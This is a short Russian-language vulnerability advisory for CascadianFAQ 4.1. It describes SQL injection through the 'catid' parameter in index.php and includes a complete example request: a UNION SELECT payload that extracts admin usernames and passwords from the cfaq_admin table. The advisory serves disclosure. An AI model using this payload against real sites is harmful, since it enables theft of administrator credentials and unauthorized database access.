Программа: CascadianFAQ 4.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «catid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
//index.php?catid=-1%20union%20select%20concat(char(85), char(115),char(101),char(114),char(110),char(97),char(109),
char(101),char(58),username,char(32),char(124),char(124), char(32),char(80),char(97),char(115),char(115),char(119),
char(111),char(114),char(100),char(58),password),
2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*
